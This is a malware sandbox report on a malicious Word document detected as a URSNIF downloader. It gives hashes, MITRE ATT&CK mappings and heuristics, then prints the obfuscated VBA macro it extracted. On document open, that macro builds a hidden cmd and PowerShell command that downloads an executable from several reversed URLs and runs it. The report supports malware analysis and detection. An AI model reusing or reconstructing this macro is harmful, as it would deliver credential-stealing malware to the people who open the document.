Office (OLE) malware analysis — malicious · ca4670d0083c6a16

MALICIOUS

Office (OLE)

75.0 KB Created: 2018-09-11 17:07:00 Authoring application: Microsoft Office Word First seen: 2019-03-18

MD5: ca9f1443c8b32c7117d543afc674e703 SHA-1: 542ce5ca97bbe10b2e7b8265c80621a56f304d1c SHA-256: ca4670d0083c6a16ff9c12422ad00299481fbe0c77eb472f6dcb15f01a6f8d8a

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro that executes a Shell command. The macro attempts to download and execute a second-stage payload, as indicated by the ClamAV detection as 'Doc.Downloader.URSNIF-6729855-3'. The Document_Open macro and the use of Shell() are strong indicators of malicious intent.

Heuristics 5

ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6257 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6257 bytes
SHA-256: `8b85b1ae6df68725ba8aee40f2989481f376ff129b4f581a36ec0376a37af824`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "qQJzIvAOH" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next VarType "108616445" + "XvtE" + "YtajNkLi" + "Ju" VarType "WKAi" + "2838" VarType "502" + "1893" VarType "8031" + "D" VarType "wtq" + "POR" VarType "Z" + "VwkqHz" VarType "545" + "263254937" VarType "420607815" + "EfAs" Shell Dcbdr + aKjYIF, Format(vbHide) VarType "ffnwLpqwZOBi" + "FILraYtwYGT" + "wzEjwp" + "264225734" VarType "YGNb" + "419890752" VarType "8208" + "531448503" End Sub Attribute VB_Name = "GnRtwtbzWpB" Function Dcbdr() On _ Error _ Resume _ Next VarType "tRt" + "341991959" VarType "1139" + "km" + "vfjisJZ" + "64982178" lKFWOPncR = Format(Chr(15 + 2 + 7 + 14 + 61)) + "md /V" + ":/" + Format(Chr(10 + 1 + 5 + 9 + 42)) + Format(Chr(4 + 0 + 2 + 4 + 24)) + "s^" + "e^t S^8" + "=^ ^ " + " ^ ^ " + " " + "^ " + " ^ ^ " + " ^}}{^h" + Format(Chr(15 + 2 + 7 + 14 + 61)) + "^t^" + "a" + Format(Chr(15 + 2 + 7 + 14 + 61)) + "}^;ka" + "er^b" VarType "M" + "ifqXzaI" + "219639133" + "wbYr" VarType "RKhzAvcjz" + "zo" + "8987" + "5968" irRUYQQ = "^" + ";" + "R" + "^hX" + "$ ^m^e" + "t" + "I-e" + "^kovnI^" + ";)R" + "^hX^" + "$^" + " " + "^,^qUs$" VarType "v" + "1460" + "1761" + "U" VarType "aEvL" + "FbrviBwtzziiPD" YaPsBV = "(el^i" + "^F^da^" + "ol" + "nwo^D" + "^.qti^" + "${yr" VarType "75350078" + "3423" VarType "5846" + "4337" VarType "BaDiXUNO" + "26787437" + "491871598" + "zvTlkO" VarType "89337191" + "jZI" LRfTWJi = "^t{)j" + Format(Chr(10 + 1 + 5 + 9 + 42)) + Format(Chr(10 + 1 + 5 + 9 + 42)) + "^$ n" + "^i^" + " q" + "U^s$(" + "h" + Format(Chr(15 + 2 + 7 + 14 + 61)) + "ae" + "rof^;'e" + "^x" + "^e." VarType "300716135" + "9908" VarType "925" + "hR" + "212" + "lQw" WhpXiVl = "'+b" + Format(Chr(10 + 1 + 5 + 9 + 42)) + "N^" + "$" + "^+^'\'+" + Format(Chr(15 + 2 + 7 + 14 + 61)) + "i^l^b^" + "u^p:vne" + "$^=" + "R^hX" VarType "Ml" + "267889048" + "343655848" + "4952" VarType "zAuIzUV" + "lUI" + "Iz" + "3426" ZYRlXli = "$^;^'^" + "61" + "^" + "9^'^ ^" + "= ^b" + Format(Chr(10 + 1 + 5 + 9 + 42)) + "N^$" VarType "daNH" + "ZkpmhVsrCkLIU" + "pGI" + "ZiwzIVIzs" VarType "i" + "bfFa" RFibwB = "^;)'" + "@'(t" + "i^l" + "pS^." + "'^E^7^e" + "^" VarType "OJfow" + "506626630" + "47785217" + "YsCfjRIXTqqO" VarType "RYEAcZXM" + "285341926" VarType "ndzc" + "UihcioTY" + "515989082" + "110322693" VarType "mA" + "513168907" LuBdpajiCjX = "Q" + "U^u" + "^e" + "/^e" + "t^" VarType "168799218" + "Fz" VarType "6089" + "XN" VarType "H" + "iwjF" QumAtw = "i^s^.a^" + "i" + "^l^i^h" + "p^eni" + Format(Chr(15 + 2 + 7 + 14 + 61)) + "//^:p^" + "tth" + "@Xk^IN" VarType "nAkw" + "4459" VarType "n" + "2856" VarType "I" + "ZHLz" VarType "WDPkvws" + "V" tYBQzOZh = "fw2/m^" + "o" + Format(Chr(15 + 2 + 7 + 14 + 61)) + "^.w^-" + "88//:^p" + "tt" + "h^" + "@W^T4" + "h^I" + "^" + "Z^J^" + "O" + "OR/^se." VarType "9450" + "JSMo" VarType "zOHFlBFof" + "vXHv" + "HtH" + "lQpp" VarType "8694" + "mDzEk" VarType "347548527" + "kJDwSrMYSLCpvK" + "OUHsqYwGEuiEP" + "5899" zXXubLq = "p" + "o^h^" + "s^z^enu" + "t" + "na/" + "/:" + "p^tt^h" + "^@^T^2R" VarType "57660975" + "ivA" VarType "w" + "251436741" + "118240006" + "ozWdjKZOjwz" VarType "9142" + "174330589" + "213844955" + "tJ" wwFrRjLB = "^z" + "^I4p/" + "ur.nr^e" + "^" + "d" Dcbdr = lKFWOPncR + irRUYQQ + YaPsBV + LRfTWJi + WhpXiVl + ZYRlXli + RFibwB + LuBdpajiCjX + QumAtw + tYBQzOZh + zXXubLq + wwFrRjLB VarType "u" + "CwlBbbNkP" VarType "805" + "5984" + "wYvs" + "R" VarType "ajjCPTJa" + "7473" VarType "bwOo" + "5420" + "UZD" + "zcl" End Function Function aKjYIF() On _ Error _ Resume _ Next VarType "437446952" + "7346" + "221727816" + "jIBnuRbEKZDi" VarType "B" + "51797294" + "301085 ... (truncated)

SHA-256: 8b85b1ae6df68725ba8aee40f2989481f376ff129b4f581a36ec0376a37af824

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "qQJzIvAOH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   VarType "108616445" + "XvtE" + "YtajNkLi" + "Ju"
   VarType "WKAi" + "2838"
   VarType "502" + "1893"
   VarType "8031" + "D"
   VarType "wtq" + "POR"
   VarType "Z" + "VwkqHz"
   VarType "545" + "263254937"
   VarType "420607815" + "EfAs"
Shell Dcbdr + aKjYIF, Format(vbHide)
   VarType "ffnwLpqwZOBi" + "FILraYtwYGT" + "wzEjwp" + "264225734"
   VarType "YGNb" + "419890752"
   VarType "8208" + "531448503"
End Sub



Attribute VB_Name = "GnRtwtbzWpB"
Function Dcbdr()

On _
Error _
Resume _
Next
VarType "tRt" + "341991959"
   VarType "1139" + "km" + "vfjisJZ" + "64982178"
lKFWOPncR = Format(Chr(15 + 2 + 7 + 14 + 61)) + "md /V" + ":/" + Format(Chr(10 + 1 + 5 + 9 + 42)) + Format(Chr(4 + 0 + 2 + 4 + 24)) + "s^" + "e^t S^8" + "=^   ^ " + " ^ ^ " + " " + "^   " + "  ^  ^ " + " ^}}{^h" + Format(Chr(15 + 2 + 7 + 14 + 61)) + "^t^" + "a" + Format(Chr(15 + 2 + 7 + 14 + 61)) + "}^;ka" + "er^b"
VarType "M" + "ifqXzaI" + "219639133" + "wbYr"
   VarType "RKhzAvcjz" + "zo" + "8987" + "5968"
irRUYQQ = "^" + ";" + "R" + "^hX" + "$ ^m^e" + "t" + "I-e" + "^kovnI^" + ";)R" + "^hX^" + "$^" + " " + "^,^qUs$"
VarType "v" + "1460" + "1761" + "U"
   VarType "aEvL" + "FbrviBwtzziiPD"
YaPsBV = "(el^i" + "^F^da^" + "ol" + "nwo^D" + "^.qti^" + "${yr"
VarType "75350078" + "3423"
   VarType "5846" + "4337"
   VarType "BaDiXUNO" + "26787437" + "491871598" + "zvTlkO"
   VarType "89337191" + "jZI"
LRfTWJi = "^t{)j" + Format(Chr(10 + 1 + 5 + 9 + 42)) + Format(Chr(10 + 1 + 5 + 9 + 42)) + "^$ n" + "^i^" + " q" + "U^s$(" + "h" + Format(Chr(15 + 2 + 7 + 14 + 61)) + "ae" + "rof^;'e" + "^x" + "^e."
VarType "300716135" + "9908"
   VarType "925" + "hR" + "212" + "lQw"
WhpXiVl = "'+b" + Format(Chr(10 + 1 + 5 + 9 + 42)) + "N^" + "$" + "^+^'\'+" + Format(Chr(15 + 2 + 7 + 14 + 61)) + "i^l^b^" + "u^p:vne" + "$^=" + "R^hX"
VarType "Ml" + "267889048" + "343655848" + "4952"
   VarType "zAuIzUV" + "lUI" + "Iz" + "3426"
ZYRlXli = "$^;^'^" + "61" + "^" + "9^'^ ^" + "= ^b" + Format(Chr(10 + 1 + 5 + 9 + 42)) + "N^$"
VarType "daNH" + "ZkpmhVsrCkLIU" + "pGI" + "ZiwzIVIzs"
   VarType "i" + "bfFa"
RFibwB = "^;)'" + "@'(t" + "i^l" + "pS^." + "'^E^7^e" + "^"
VarType "OJfow" + "506626630" + "47785217" + "YsCfjRIXTqqO"
   VarType "RYEAcZXM" + "285341926"
   VarType "ndzc" + "UihcioTY" + "515989082" + "110322693"
   VarType "mA" + "513168907"
LuBdpajiCjX = "Q" + "U^u" + "^e" + "/^e" + "t^"
VarType "168799218" + "Fz"
   VarType "6089" + "XN"
   VarType "H" + "iwjF"
QumAtw = "i^s^.a^" + "i" + "^l^i^h" + "p^eni" + Format(Chr(15 + 2 + 7 + 14 + 61)) + "//^:p^" + "tth" + "@Xk^IN"
VarType "nAkw" + "4459"
   VarType "n" + "2856"
   VarType "I" + "ZHLz"
   VarType "WDPkvws" + "V"
tYBQzOZh = "fw2/m^" + "o" + Format(Chr(15 + 2 + 7 + 14 + 61)) + "^.w^-" + "88//:^p" + "tt" + "h^" + "@W^T4" + "h^I" + "^" + "Z^J^" + "O" + "OR/^se."
VarType "9450" + "JSMo"
   VarType "zOHFlBFof" + "vXHv" + "HtH" + "lQpp"
   VarType "8694" + "mDzEk"
   VarType "347548527" + "kJDwSrMYSLCpvK" + "OUHsqYwGEuiEP" + "5899"
zXXubLq = "p" + "o^h^" + "s^z^enu" + "t" + "na/" + "/:" + "p^tt^h" + "^@^T^2R"
VarType "57660975" + "ivA"
   VarType "w" + "251436741" + "118240006" + "ozWdjKZOjwz"
   VarType "9142" + "174330589" + "213844955" + "tJ"
wwFrRjLB = "^z" + "^I4p/" + "ur.nr^e" + "^" + "d"
Dcbdr = lKFWOPncR + irRUYQQ + YaPsBV + LRfTWJi + WhpXiVl + ZYRlXli + RFibwB + LuBdpajiCjX + QumAtw + tYBQzOZh + zXXubLq + wwFrRjLB
   VarType "u" + "CwlBbbNkP"
   VarType "805" + "5984" + "wYvs" + "R"
   VarType "ajjCPTJa" + "7473"
   VarType "bwOo" + "5420" + "UZD" + "zcl"
End Function
Function aKjYIF()

On _
Error _
Resume _
Next
VarType "437446952" + "7346" + "221727816" + "jIBnuRbEKZDi"
   VarType "B" + "51797294" + "301085
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.